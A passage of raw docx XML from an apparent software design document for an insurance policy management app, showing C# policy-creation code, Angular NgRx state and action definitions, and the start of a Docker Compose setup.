          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        policy.PolicyNumber = await GeneratePolicyNumberAsync();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        policy.CreatedByUserId = request.UserId;</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_context.Policies.Add(policy);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        await _context.SaveChangesAsync(cancellationToken);</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 Publish domain event — triggers audit log + welcome email</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        await _mediator.Publish(new PolicyCreatedEvent</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PolicyId = policy.Id,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            PolicyHolderName = policy.PolicyHolderName,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            UserId = request.UserId,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        }, cancellationToken);</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return _mapper.Map&lt;PolicyDto&gt;(policy);</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec5-2" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2  NgRx State Management — Angular</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Packages to Install</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">npm install @ngrx/store @ngrx/effects @ngrx/entity @ngrx/store-devtools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">State Shape</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">export interface AppState {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    auth:          AuthState;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    policies:      PolicyState;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    notifications: NotificationState;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    dashboard:     DashboardState;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">}</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export interface PolicyState {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    items:        Policy[];</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    selectedId:   number | null;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    totalCount:   number;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    filter:       PolicyFilter;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    loading:      boolean;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    error:        string | null;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Policy Actions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">export const PolicyActions = createActionGroup({</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    source: "Policy",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    events: {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        "Load Policies":         props&lt;{ filter: PolicyFilter }&gt;(),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        "Load Policies Success": props&lt;{ result: PagedResult&lt;Policy&gt; }&gt;(),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        "Load Policies Failure": props&lt;{ error: string }&gt;(),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        "Select Policy":         props&lt;{ id: number }&gt;(),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        "Mark As Paid":          props&lt;{ id: number; payment: CreatePayment }&gt;(),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        "Mark As Paid Success":  props&lt;{ policy: Policy }&gt;(),</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec5-3" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">5.3  Docker Compose — Full Stack Setup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"># docker-compose.yml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">version: "3.9"</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services:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  api:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    build:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">      context: ./backend/PolicyManager.API</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">      dockerfile: Dockerfile</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    ports: ["5100:80"]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    environment:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">      - ASPNETCORE_ENVIRONMENT=Production</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">      - ConnectionStrings__Default=Server=db;Database=PolicyDB;...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">      - GeminiApi__ApiKey=${GEMINI_API_KEY}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">      - JwtSettings__SecretKey=${JWT_SECRET}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">      - Redis__ConnectionString=redis:6379</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    depends_on: [db, redis]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    volumes:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">      - ./uploads:/app/wwwroot/uploads</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frontend:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    build:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
